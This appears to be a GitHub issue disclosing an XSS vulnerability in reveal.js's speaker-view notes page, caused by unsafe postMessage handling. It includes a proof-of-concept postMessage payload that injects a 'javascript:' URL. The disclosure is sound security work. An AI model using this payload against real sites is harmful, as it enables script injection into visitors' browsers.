"plugin/notes/speaker-view.html" is vulnerable to XSS due unsafe postMessage communication

[avramit]

During my daily browsing on HackerOne's platform I came across the following report.

As I was reading the report something caught my eye, it was the url path, it looked a bit strange, why the word plugin would be in such page?

/plugin/notes/notes.html

My assumption was that this page uses an external framework. I've searched for the path in google and found the following file on github:

https://github.com/planetoftheweb/d3/blob/master/docs/js/plugin/notes/notes.html

First thing I saw while reading the code was the title of the page "reveal.js - Slide Notes", I googled up "reveal.js" and found this repository, after digging up in the files I've found the following matching file (name is different):

https://github.com/hakimel/reveal.js/blob/f618de81de9b218c618058b8e4aa22f5f2bc488e/plugin/notes/speaker-view.html

By reading it's code I've obtain another xss vulnerability which I could trigger by using the postMessage api:

postMessage(JSON.stringify({
	namespace: 'reveal-notes',
	type: 'connect',
	state: {
		indexh: '',
		indexv: ''
	},
	url: 'javascript:alert(document.domain);//'
}), '*')

[avramit]

Sorry for the mess, I accidentally posted this issue before finish writing.